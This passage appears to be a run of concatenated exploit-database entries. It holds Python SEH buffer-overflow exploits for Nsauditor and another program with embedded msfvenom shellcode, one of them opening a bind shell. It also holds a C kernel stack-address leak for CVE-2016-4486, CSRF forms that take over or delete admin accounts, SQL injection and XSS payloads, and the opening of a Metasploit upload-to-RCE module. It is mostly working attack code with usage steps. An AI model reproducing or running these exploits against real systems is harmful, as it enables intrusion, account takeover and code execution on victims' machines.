SEH = "\xdd\x74\x06\x10" #pop pop ret SoftwareLog.dll
nops = "\x90" * 20
#badchar \x00\
#msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python
buf = ""
buf += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
buf += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
buf += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
buf += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
buf += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
buf += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
buf += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
buf += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
buf += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
buf += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
buf += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
buf += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
buf += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
buf += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
buf += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
buf += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
buf += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
buf += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
buf += "\x8e\x2a\x79\xdb"
payload = buffer + NSEH + SEH + nops + buf
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Nsauditor Local SEH Buffer Overflow
# Date: 15-12-2018
# Vendor Homepage:http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Exploit Author: Achilles
# Tested Version: 3.0.28.0
# Tested on: Windows XP SP3
# 1.- Run python code : Nsauditor.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Nsauditor
# 4.- In the Window select 'Tools' > 'Dns Lookup'
# 5.- Paste the content of EVIL.txt into the Field: 'Dns Query'
# 6.- Click 'Resolve'
# 7.- Connect with Netcat on port 3110
#!/usr/bin/python
buffer = "\x41" * 5235
NSEH = "\xeb\x06\x90\x90" #jmp short 6
SEH = "\x30\xFF\xE6\x01" #nsnetutils.dll
nops = "\x90" * 20
#badchar \x00\x0a\x0d\x2e
#msfvenom Bind port 3110
buf = ""
buf += "\xd9\xc7\xb8\x8e\xe7\x77\xf1\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x43\x13\x03\xcd\xf4\x95"
buf += "\x04\x2d\x12\xdb\xe7\xcd\xe3\xbc\x6e\x28\xd2\xfc\x15"
buf += "\x39\x45\xcd\x5e\x6f\x6a\xa6\x33\x9b\xf9\xca\x9b\xac"
buf += "\x4a\x60\xfa\x83\x4b\xd9\x3e\x82\xcf\x20\x13\x64\xf1"
buf += "\xea\x66\x65\x36\x16\x8a\x37\xef\x5c\x39\xa7\x84\x29"
buf += "\x82\x4c\xd6\xbc\x82\xb1\xaf\xbf\xa3\x64\xbb\x99\x63"
buf += "\x87\x68\x92\x2d\x9f\x6d\x9f\xe4\x14\x45\x6b\xf7\xfc"
buf += "\x97\x94\x54\xc1\x17\x67\xa4\x06\x9f\x98\xd3\x7e\xe3"
buf += "\x25\xe4\x45\x99\xf1\x61\x5d\x39\x71\xd1\xb9\xbb\x56"
buf += "\x84\x4a\xb7\x13\xc2\x14\xd4\xa2\x07\x2f\xe0\x2f\xa6"
buf += "\xff\x60\x6b\x8d\xdb\x29\x2f\xac\x7a\x94\x9e\xd1\x9c"
buf += "\x77\x7e\x74\xd7\x9a\x6b\x05\xba\xf2\x58\x24\x44\x03"
buf += "\xf7\x3f\x37\x31\x58\x94\xdf\x79\x11\x32\x18\x7d\x08"
buf += "\x82\xb6\x80\xb3\xf3\x9f\x46\xe7\xa3\xb7\x6f\x88\x2f"
buf += "\x47\x8f\x5d\xc5\x4f\x36\x0e\xf8\xb2\x88\xfe\xbc\x1c"
buf += "\x61\x15\x33\x43\x91\x16\x99\xec\x3a\xeb\x22\x1e\x9d"
buf += "\x62\xc4\x74\xf1\x22\x5e\xe0\x33\x11\x57\x97\x4c\x73"
buf += "\xcf\x3f\x04\x95\xc8\x40\x95\xb3\x7e\xd6\x1e\xd0\xba"
buf += "\xc7\x20\xfd\xea\x90\xb7\x8b\x7a\xd3\x26\x8b\x56\x83"
buf += "\xcb\x1e\x3d\x53\x85\x02\xea\x04\xc2\xf5\xe3\xc0\xfe"
buf += "\xac\x5d\xf6\x02\x28\xa5\xb2\xd8\x89\x28\x3b\xac\xb6"
buf += "\x0e\x2b\x68\x36\x0b\x1f\x24\x61\xc5\xc9\x82\xdb\xa7"
buf += "\xa3\x5c\xb7\x61\x23\x18\xfb\xb1\x35\x25\xd6\x47\xd9"
buf += "\x94\x8f\x11\xe6\x19\x58\x96\x9f\x47\xf8\x59\x4a\xcc"
buf += "\x08\x10\xd6\x65\x81\xfd\x83\x37\xcc\xfd\x7e\x7b\xe9"
buf += "\x7d\x8a\x04\x0e\x9d\xff\x01\x4a\x19\xec\x7b\xc3\xcc"
buf += "\x12\x2f\xe4\xc4"
payload = buffer + NSEH + SEH + nops + buf
try:
f=open("EVIL.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
/*
* [ Briefs ]
* - CVE-2016-4486 has discovered and reported by Kangjie Lu.
* - This is local exploit against the CVE-2016-4486.
*
* [ Tested version ]
* - Distro : Ubuntu 16.04
* - Kernel version : 4.4.0-21-generic
* - Arch : x86_64
*
* [ Prerequisites ]
* - None
*
* [ Goal ]
* - Leak kernel stack base address of current process by exploiting CVE-2016-4486.
*
* [ Exploitation ]
* - CVE-2016-4486 leaks 32-bits arbitrary kernel memory from uninitialized stack.
* - This exploit gets 61-bits stack base address among the 64-bits full address.
* remaining 3-bits is not leaked because of limitation of ebpf.
* - Full exploitation are performed as follows.
*
* 1. Spraying kernel stack as kernel stack address via running ebpf program.
* - We can spray stack up to 512-bytes by running ebpf program.
* - After this step, memory to be leaked will be filled with kernel stack address.
* 2. Trigger CVE-2016-4486 to leak 4-bytes which is low part of stack address.
* - After this step, stack address : 0xffff8800????????; (? is unknown address yet.)
* 3. Leak high 4-bytes of stack address. The leaking is done as one-by-one bit. why one-by-one?
* - CVE-2016-4486 allows to leak 4-bytes only, so that we always get low 4-bytes of stack address.
* - Then, How to overcome this challenge?? The one of possible answer is that
* do operation on high-4bytes with carefully selected value which changes low-4bytes.
* For example, Assume that real stack address is 0xffff880412340000;
* and, do sub operation. ==> 0xffff880412340000 - 0x0000000012360000 (selected value);
* The result will be "0xffff8803....." ==> Yap! low 4-bytes are changed!! and We can see this!
* The result makes us to know that high 4-bytes are smaller than 0x12360000;
* Then, We can keep going with smaller value.
* - The algorithm is quite similar to quick-search.
* 4. Unfortunately, ebpf program limitation stops us to leak full 64-bits.
* - 3-bits (bit[16], bit[15], bit[14]) are not leaked.
* - But, Since 3-bit is not sufficient randomness, It's very valuable for attacker.
* Bonus) Why do I use compat_sendmsg() instead of normal sendmsg()?
* - When I did spraying stack with normal sendmsg(), I couldn't spray up to memory to be leaked.
* - If I use compat-sendmsg(), The execution path will be different from normal sendmsg().
* This makes me to spray it more far.
*
* [ Run exploit ]
* - $ gcc poc.c -o poc
* - $ ./poc
* ....
* ....
* leak stack address range :
* -----from : ffff88007f7e0000
* --------to : ffff88007f7fc000
* (Since we can get 61-bit address, Print the possible address range out.)
*
* [ Contact ]
* - jinb.park7@gmail.com
* - github.com/jinb-park
*/
#include <asm/types.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))
#define INTERFACE_INDEX (0)
#define LEAK_OFFSET (28)
/*
* BPF-based stack sprayer
*/
/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10
#define BPF_MOV32_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_STX_ADD_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_XADD | BPF_SIZE(SIZE),\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_ALU64_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
int bpf_(int cmd, union bpf_attr *attrs)
{
return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}
int prog_load(struct bpf_insn *insns, size_t insns_count)
{
char verifier_log[100000];
union bpf_attr create_prog_attrs = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insn_cnt = insns_count,
.insns = (uint64_t)insns,
.license = (uint64_t)GPLv2,
.log_level = 1,
.log_size = sizeof(verifier_log),
.log_buf = (uint64_t)verifier_log
};
int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
int errno_ = errno;
errno = errno_;
if (progfd == -1) {
printf("bpf prog load error\n");
exit(-1);
}
return progfd;
}
int create_socket_by_socketpair(int *progfd)
{
int socks[2];
if (socketpair(AF_UNIX, SOCK_SEQPACKET, 0, socks)) {
printf("socketpair error\n");
exit(-1);
}
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, progfd, sizeof(int))) {
printf("setsockopt error\n");
exit(-1);
}
return socks[1];
}
int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count)
{
int progfd = prog_load(insns, insns_count);
return create_socket_by_socketpair(&progfd);
}
#define NR_sendmsg_32 370 // for 32-bit
typedef unsigned int compat_uptr_t;
typedef int compat_int_t;
typedef unsigned int compat_size_t;
typedef unsigned int compat_uint_t;
struct compat_msghdr {
compat_uptr_t msg_name; /* void * */
compat_int_t msg_namelen;
compat_uptr_t msg_iov; /* struct compat_iovec * */
compat_size_t msg_iovlen;
compat_uptr_t msg_control; /* void * */
compat_size_t msg_controllen;
compat_uint_t msg_flags;
};
struct compat_iovec {
compat_uptr_t iov_base;
compat_size_t iov_len;
};
int sendmsg_by_legacy_call(int fd, unsigned int msg, int flags)
{
int r = -1;
asm volatile (
"push %%rax\n"
"push %%rbx\n"
"push %%rcx\n"
"push %%rdx\n"
"push %%rsi\n"
"push %%rdi\n"
"mov %1, %%eax\n"
"mov %2, %%ebx\n"
"mov %3, %%ecx\n"
"mov %4, %%edx\n"
"int $0x80\n"
"mov %%eax, %0\n"
"pop %%rdi\n"
"pop %%rsi\n"
"pop %%rdx\n"
"pop %%rcx\n"
"pop %%rbx\n"
"pop %%rax\n"
: "=r" (r)
: "r"(NR_sendmsg_32), "r"(fd), "r"(msg), "r"(flags)
: "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi"
);
return r;
}
#define COMPAT_SENDMSG
void trigger_proc(int sockfd)
{
#ifdef COMPAT_SENDMSG
struct compat_msghdr *msg = NULL;
struct compat_iovec *iov = NULL;
#else
struct msghdr *msg = NULL;
struct iovec *iov = NULL;
#endif
char *buf = NULL;
int r;
// allocate under-32-bit address for compat syscall
msg = mmap(0x70000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (msg == MAP_FAILED) {
printf("mmap error : %d, %s\n", errno, strerror(errno));
exit(0);
}
buf = mmap(0x90000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (buf == MAP_FAILED) {
printf("mmap error : %d, %s\n", errno, strerror(errno));
exit(0);
}
iov = mmap(0xb0000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (buf == MAP_FAILED) {
printf("mmap error : %d, %s\n", errno, strerror(errno));
exit(0);
}
#ifdef COMPAT_SENDMSG
iov->iov_base = (compat_uptr_t)buf;
#else
iov->iov_base = buf;
#endif
iov->iov_len = 128;
msg->msg_name = NULL;
msg->msg_namelen = 0;
#ifdef COMPAT_SENDMSG
msg->msg_iov = (compat_uptr_t)iov;
#else
msg->msg_iov = iov;
#endif
msg->msg_iovlen = 1;
msg->msg_control = NULL;
msg->msg_controllen = 0;
msg->msg_flags = 0;
#ifdef COMPAT_SENDMSG
r = sendmsg_by_legacy_call(sockfd, (unsigned int)msg, 0);
#else
r = sendmsg(sockfd, msg, 0);
#endif
if (r < 0) {
printf("sendmsg error, %d, %s\n", errno, strerror(errno));
exit(-1);
}
}
int sockfds = -1;
void stack_spraying_by_bpf(unsigned long val)
{
int r;
struct bpf_insn stack_spraying_insns[] = {
BPF_MOV64_REG(BPF_REG_3, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -val),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -368),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -376),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -384),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -392),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -400),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -408),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -416),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -424),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -432),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -440),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -448),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -456),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -464),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -472),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -480),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -488),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -496),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -504),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -512),
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
};
sockfds = create_filtered_socket_fd(stack_spraying_insns, ARRSIZE(stack_spraying_insns));
if (sockfds < 0)
return;
trigger_proc(sockfds);
close(sockfds);
//sleep(1);
}
/*
28byte, 32byte including padding
struct rtnl_link_ifmap {
__u64 mem_start;
__u64 mem_end;
__u64 base_addr;
__u16 irq;
__u8 dma;
__u8 port;
};*/
// rtnl_fill_link_ifmap <-- rtnl_fill_ifinfo (symbol)
struct {
struct nlmsghdr nh;
struct ifinfomsg ifm;
char attrbuf[512];
} req;
// Ubuntu 4.4.0-21-generic
#define RANGE_MIN_MASK ~((1<<16) | (1<<15) | (1<<14)) // and
#define RANGE_MAX_MASK ((1<<16) | (1<<15) | (1<<14)) // or
int main(int argc, char **argv)
{
unsigned char buf[65535];
unsigned char map_buf[36] = {0,};
struct nlmsghdr *nl_msg_ptr;
struct ifinfomsg *inf_msg_ptr;
struct rtnl_link_ifmap *map_ptr;
struct rtattr *rta_ptr;
int size, len, attr_len, offset;
int progfd;
unsigned int sub_val = 0;
unsigned int leak_value;
unsigned long leak_full_stack = 0;
unsigned int low_stack = 0;
int i;
for (i=0; i<16; i++) {
int rtnetlink_sk = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE);
memset(&req, 0, sizeof(req));
req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));
req.nh.nlmsg_flags = NLM_F_DUMP | NLM_F_REQUEST;
req.nh.nlmsg_type = RTM_GETLINK;
req.nh.nlmsg_seq = 1;
req.ifm.ifi_family = AF_UNSPEC;
req.ifm.ifi_index = INTERFACE_INDEX;
req.ifm.ifi_change = 0xffffffff;
if (i == 0)
sub_val = 0;
else
sub_val += (1 << (32 - i));
stack_spraying_by_bpf((unsigned long)sub_val);
if (send(rtnetlink_sk, &req, req.nh.nlmsg_len, 0) < 0) {
printf("send error\n");
goto out;
}
while (1) {
if ((size = recv(rtnetlink_sk, buf, sizeof(buf), 0)) < 0) {
fprintf(stderr, "ERROR recv(): %s\n", strerror(errno));
goto out;
}
for (nl_msg_ptr = (struct nlmsghdr *)buf; size > (int)sizeof(*nl_msg_ptr);) {
len = nl_msg_ptr->nlmsg_len;
if (nl_msg_ptr->nlmsg_type == NLMSG_ERROR) {
printf("NLMSG_ERROR\n");
goto out;
}
else if (nl_msg_ptr->nlmsg_type == NLMSG_DONE)
break;
if (!NLMSG_OK(nl_msg_ptr, (unsigned int)size)) {
printf("Not OK\n");
goto out;
}
attr_len = IFLA_PAYLOAD(nl_msg_ptr);
inf_msg_ptr = (struct ifinfomsg *)NLMSG_DATA(nl_msg_ptr);
rta_ptr = (struct rtattr *)IFLA_RTA(inf_msg_ptr);
for (; RTA_OK(rta_ptr, attr_len); rta_ptr = RTA_NEXT(rta_ptr, attr_len)) {
if (rta_ptr->rta_type == IFLA_MAP) {
if (rta_ptr->rta_len != sizeof(map_buf)) {
printf("wrong size\n");
goto out;
}
memcpy(map_buf, RTA_DATA(rta_ptr), sizeof(map_buf));
map_ptr = &map_buf;
leak_value = *(unsigned int *)(map_buf + LEAK_OFFSET);
printf("leak_value : %08x\n", leak_value);
break;
}
}
size -= NLMSG_ALIGN(len);
nl_msg_ptr = (struct nlmsghdr *)((char *)nl_msg_ptr + NLMSG_ALIGN(len));
}
break;
}
if (low_stack == 0)
low_stack = leak_value;
else
if (leak_value != low_stack)
sub_val &= (~(1 << (32 - i))); // clear bit
memcpy((unsigned char *)&leak_full_stack + 4, &low_stack, 4);
memcpy((unsigned char *)&leak_full_stack, &sub_val, 4);
printf("[try-%d] stack address : %lx\n", i, leak_full_stack);
out:
close(rtnetlink_sk);
}
printf("=======================================================================\n");
printf("leak stack address range : \n");
printf("-----from : %lx\n", leak_full_stack & RANGE_MIN_MASK);
printf("--------to : %lx\n", leak_full_stack | RANGE_MAX_MASK);
printf("======================================================================\n");
return 0;
}
# Exploit Title: Admin Account take over Via CSRF
# Google Dork: N/A
# Date: 17-12-2018
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: https://www.phpjabbers.com/hotel-booking-system/
# Software Link: https://demo.phpjabbers.com/1545033057_422/index.php?controller=pjAdmin&action=pjActionIndex
# Version: 3.4
# Tested on: Windows x64/ Kali linux x64
# CVE : N/A
************************Description:**********************
The online hotel reservation system is built in PHP and uses MySQL to
store data. The script provides a powerful room booking and reservation
management functionality and allows you to install a clear
call-to-action tool on your hotel website which will impact conversions
and increase bookings. Our room booking system is highly customizable
and compatible with various website types.
*************************Vulnerability Description:****************
An attacker can take the admin account via sending the Malicious link
to the authenticated user then the Victim clicks on the malicious link
then the admin password is change
************************************
PoC**************************************
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://site.com/admin/index.php?controller=pjAdminUsers&action=pjActionUpdate"
method="POST">
<input type="hidden" name="user_update" value="1" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="role_id" value="1" />
<input type="hidden" name="email" value="admin@admin.com" />
<input type="hidden" name="password" value="pass1234" />
<input type="hidden" name="name" value="Administrator" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="status" value="T" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: SQL Injection in Yeswiki (Cercopitheque)
# Date: 02/07/2018
# Exploit Author: Mickael BROUTY (@ark1nar) - FIDENS
# Vendor Homepage: https://yeswiki.net
# Software Link: https://repository.yeswiki.net/cercopitheque/yeswiki-cercopitheque-2018-12-07-1.zip
# Version: Yeswiki Cercopitheque 2018-06-19-1
# Tested on: Kali linux
# CVE : CVE-2018-13045
# POC:
# 1)
# http://localhost/[PATH]/?BaZar&vue=exporter&id=[SQL]
#
Exploitation example:
http://localhost/[PATH]/?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15#
# Exploit Title: Integria IMS 5.0.83 - Cross-Site Request Forgery
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-12-19
# Google Dork: N/A
# Vendor: Artica ST
# Software Link: https://github.com/articaST/integriaims
# Affected Version: 5.0.83 and possibly before
# Patched Version: 5.0.84
# Category: Web Application
# Platform: Windows & Ubuntu
# Tested on: Win10x64 & Kali Linux
# CVE: 2018-19829
# References:
# https://hackpuntes.com/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/
# https://github.com/articaST/integriaims/commit/a37c0c3d7cad74df64bfd3d98488aee4fa28b839
# 1. Technical Description:
# Integria IMS version 5.0.83 and possibly before are affected by Cross-Site Request Forgery
# vulnerability, an attacker could delete users through GET or POST requests.
# 2.1 Proof Of Concept (Delete User):
(Method 1 - GET)
Use Google URL Shortener (or similar) to shorten the next url
http://[PATH]/ajax.php?page=include/ajax/delete_item_general&delete_item=1&name=delete_user&id=[ID])
and send it to the victim.
(Method 2 - POST)
Use next form and send it tho the victim.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://[PATH]/index.php">
<input type="hidden" name="sec" value="users" />
<input type="hidden" name="sec2" value="godmode/usuarios/lista_usuarios" />
<input type="hidden" name="borrar_usuario" value="[ID]" />
<input type="submit" value="Delete user" />
</form>
</body>
</html>
# Exploit Title: Integria IMS 5.0.83 - Cross-Site Scripting
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-12-18
# Google Dork: N/A
# Vendor: Artica ST
# Software Link: https://github.com/articaST/integriaims
# Affected Version: 5.0.83 and possibly before
# Patched Version: 5.0.84
# Category: Web Application
# Platform: Windows
# Tested on: Win10x64 & Kali Linux
# CVE: 2018-19828
# References:
# https://hackpuntes.com/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/
# https://github.com/articaST/integriaims/commit/25d810b1c8e138e4b47d5cd14b2cd9b564f19b1e
# 1. Technical Description:
# search_string parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks
# through a GET request in index.php resource.
# 2. Proof Of Concept (PoC):
# On the main page, go to the search form and add the following payload
# '><script>alert('PoC CVE-2018-19828')</script>
# 3. Payload
# http://[PATH]/index.php?search_string=%27%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-19828%27)%3C%2Fscript%3E
# Exploit Title: Bolt CMS <3.6.2 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-12-18
# Exploit Author: Raif Berkay Dincel [ author=9567 ]
# Contact: www.raifberkaydincel.com
# Vendor Homepage: bolt.cm
# Vulnerable Software --> [ https://github.com/rdincel1/Bolt-CMS-3.6.2---Cross-Site-Scripting/raw/master/bolt-v3.6.2.zip ]
# Affected Version: [ < 3.6.2 ]
# CVE-ID: CVE-2018-19933
# Tested on: Parrot Security OS / Linux Mint / Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: http://127.0.0.1:8000/preview/page
# Attack Pattern: <script>alert("Raif")</script>
# Description
Bolt CMS <3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry.
# PoC [Video]: https://youtu.be/3eTPyIpjCJg
# Proof of Concepts:
POST /preview/page HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 396
Connection: close
Cookie: bolt_session_cf7976ea5999f8e272ce7cd50c84d240=14b61865131cf9422af970ae28a097b7; bolt_authtoken_cf7976ea5999f8e272ce7cd50c84d240=0b69633d5a549f19bf3faa88462b7b8e17ba57ba9dff6d25a708efe6dd6a9a04
Upgrade-Insecure-Requests: 1
content_edit%5B_token%5D=jMmm41dJQXpXx3gwE_VQkA60fdsNo6DERJClPVkYh7U&editreferrer=&contenttype=pages&title=%3Cscript%3Ealert%28%22Raif%22%29%3C%2Fscript%3E&slug=script-alert-raif-script&image%5Bfile%5D=&files%5B%5D=&teaser=&body=&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2018-12-07+00%3A12%3A05&datedepublish=&ownerid=1&_live-editor-preview=
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'uri'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize
super(
'Name' => 'Rukovoditel Project Management/CRM 2.3.1 -
(Authenticated) Remote Code Execution',
'Description' => %q{
This module exploits a file upload vulnerability in Rukovoditel
PM/CRM version 2.3.1.
Application allows the user to upload a background image, and does
not perform extension checking exactly.
Application agrees to upload if "gif" file header is added to the
header of our payload file.
However, many file types do not have permission to work.
".htaccess" is blocking that.
it has file extension check as follows,
<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">
There is no upper and lower case control. Therefore, the extension
of our file can be .pHp .Php .PhP and such.
The module is uploading by create a payload as above to get
Meterpreter session.
},
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf
Module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', '
https://pentest.com.tr/exploits/Rukovoditel-Project-Management-CRM-2-3-1-Authenticated-Remote-Code-Execution.html'],
['CVE', '2018-20166'],
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Rukovoditel PM/CRM <= 2.3.1', {}]
],
'DisclosureDate' => '14 Dec 2018',
'Privileged' => false,
'DefaultTarget' => 0
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to i-doit',
'/']),
OptString.new('USER', [true, 'User to login with', 'admin']),
OptString.new('PASS', [true, 'Password to login with',
'password']),
], self.class)
end
##
# Exploitation of Vulnerability
##
def exploit
random_value = Rex::Text.rand_text_alpha(10)
sid_md5 = Digest::MD5.hexdigest random_value
print_status("sid = #{sid_md5}")
cookie = "cookie_test=please_accept_for_session;" + " sid=" + sid_md5
res1 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri,
"/index.php?module=users/login"),
'cookie' => cookie,
})
